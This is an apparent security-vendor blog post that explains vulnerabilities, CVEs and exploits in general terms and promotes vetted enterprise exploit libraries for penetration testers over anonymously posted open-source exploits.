Open Source vs. Enterprise: Why Not All Exploits are Created Equal

A common tactic of attackers trying to breach an environment is to use an exploit against a known vulnerability in an application or device present in a targeted infrastructure. Exploiting a vulnerability can provide an attacker with privileges or capabilities they would not normally be granted. In order to provide insight into what threat actors might be able to do, pen testers also use exploits. But where exactly do these exploits come from, and are they all safe to use? Let’s dive deeper into how vulnerabilities and exploits work, who makes them, and how to know which ones can be trusted.

The Relationship Between Exploits and Vulnerabilities

Every infrastructure is made up of different applications and devices. Sometimes, one of these assets is released with an unintentional bug or weakness. Threat actors are constantly on the lookout for them, as they can provide a point of entry that can be used to eventually gain full access.

There are many types of security weaknesses that can be exploited in different ways. Most have been compiled into a list called the Common Weakness Enumeration (CWE). Some examples include cross-site scripting, missing authorization, buffer overflow, and improper privilege management. When one of these weaknesses is found in a specific device or piece of software, this is considered a vulnerability.

When vulnerabilities are found or confirmed by either the manufacturer or a third-party, they can be filed and given a Common Vulnerability and Exposure (CVE) ID number. This increases awareness so organizations can find out if a known vulnerability exists in one of their assets. Typically, an advisory is written alongside the CVE, giving details on what it is, as well as information on whether there is a workaround or a patch.

Exploits are simply the way these vulnerabilities are taken advantage of. They can be a piece of code, software, or a set of commands. Some exploits can be deployed remotely, while others require a threat actor to use phishing or other methods to have them launched internally.

Exploits can also be used by attackers even after a vulnerability has been identified. Many organizations don’t stay up to date on the latest advisories, or fail to properly patch all of their systems. In fact, the Cybersecurity & Infrastructure Security Agency released a list of some of the most commonly exploited vulnerabilities. For example, 2020 has seen an increase in attacks on VPNs, like the arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781 or the arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510.

Who Can Write an Exploit?

Usually, attackers have to write exploits as they find vulnerabilities. Others are readily available on the internet, usually posted anonymously by other attackers. On the ethical hacking side, exploit development can be an advanced penetration testing skill that takes time to master. Additionally, when on a job, pen testers often don’t have the resources to create a new exploit. Many resort to searching for and using pre-written exploits they find online—oftentimes the same ones attackers use. Because exploit writing takes time and expertise, both attackers and pen testers alike are always looking for exploits or exploit libraries that can save them the effort.

What’s the Problem with Using Open Source Exploits?

There are a few key issues for pen testers using open source exploits:

They may not be secure. Any exploit that is freely available online can’t be instantly trusted. They are often posted anonymously, so it can’t be verified if the exploit is safe to use. If an exploit has been written by a shady threat actor, the exploit may even cause the user’s own system harm.

They may not work. If you’re not sure of the source of the exploit, you also can’t be sure that it will do what it says it will. Pen testers must go through the timely effort of quality assurance testing in order to ensure they are secure and effective. So if it doesn’t work, a free exploit may waste more time than it saves.

The one you need may not exist. Research into a vulnerability and its corresponding exploit may prove fruitless. Pen testers can’t rely on someone they don’t know writing their exploits.

What’s are the Benefits of Using Enterprise Exploits?  

Access to enterprise exploit libraries are often a benefit that comes with owning an enterprise pen testing tool. Those who have access to them have three significant advantages.

They’re written by experts. Enterprise libraries allow you to know exactly where you’re getting your exploits from—advanced level pen testers who not only create an exploit for you, but have it validated so that you can be sure it’s both safe to use, and will get the job done.

They’re kept up to date. Just as pen testing tools are intended to save time, so do their exploit libraries. Having researchers regularly tasked with writing and verifying exploits means that pen testers with access to such a library are never delayed by having to stop and figure out how to write an exploit from scratch.

They’re unused by attackers. Threat actors cannot simply purchase exploit libraries for their own gain. For instance, Core Security uses a thorough vetting process and takes care to not allow the purchase of Core Impact and its corresponding exploit library by any organization that intends to use them for malicious purposes.

Ultimately, enterprise exploit libraries are one more way for pen testers to help organizations stay one step ahead of attackers.